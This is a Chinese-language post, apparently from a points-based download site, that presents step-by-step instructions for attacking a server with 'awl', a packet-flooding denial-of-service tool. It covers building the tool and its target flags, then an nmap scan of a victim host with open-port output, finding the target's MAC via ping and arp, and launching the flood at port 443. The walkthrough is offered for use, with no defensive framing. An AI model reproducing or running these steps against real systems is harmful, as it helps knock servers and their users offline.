awl简介:
之所以要这么多豆豆是因为这个方法真的很给力,值这个价.下面是攻击步骤,附件里是awl的源码包。一,安装:tar -zxvf awl-0.2.tar.gz./configuremake make installawl的执行程序安装后...
之所以要这么多豆豆是因为这个方法真的很给力,值这个价.下面是攻击步骤,附件里是awl的源码包。
一,安装:
tar -zxvf awl-0.2.tar.gz
./configure
make
make install
注:如果编译不正确,请按照提示安装所需软件,比如:gcc-c++
awl的执行程序安装后在/usr/local/bin/目录下
二,说明:
awl 的格式如下:
./awl -i eth0 -m aa:bb:cc:dd:ee:ff -d ip -p port
参数如下:
-i 发送包的接口,如果省略默认是eth0
-m 被攻击机器的mac地址,程序不能根据被攻击IP得到MAC,需要手工指定.先ping 目标IP,再arp -a就可以看到.如果省略则为ff:ff:ff:ff:ff:ff
-d 被攻击机器的IP
-p 被攻击机器的端口.
三,测试,
服务器端:centOS 5.0
对方服务器:freebsd 6.2 运行apache
1,首先得知对方IP
运行nmap -v -A 192.168.0.1 查看对方开了啥服务
[[email protected] bin]# nmap -v -A 10.122.89.106
Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2008-06-02 19:24 CST
DNS resolution of 1 IPs took 0.39s.
Initiating SYN Stealth Scan against 10.122.89.106 [1680 ports] at 19:24
Discovered open port 21/tcp on 10.122.89.106
Discovered open port 25/tcp on 10.122.89.106
Discovered open port 22/tcp on 10.122.89.106
Discovered open port 443/tcp on 10.122.89.106
Discovered open port 80/tcp on 10.122.89.106
Discovered open port 199/tcp on 10.122.89.106
Discovered open port 110/tcp on 10.122.89.106
Discovered open port 143/tcp on 10.122.89.106
Discovered open port 3306/tcp on 10.122.89.106
得知对方开了如上端口
ping 192.168.0.1 得知mac地址
查看arp -a 得知对方IP的MAC地址
2.开始攻击:
./awl -i eth0 -m aa:bb:cc:dd:ee:ff -d 192.168.0.1 -p 443
ping 192.168.0.1 -t 查下对方反应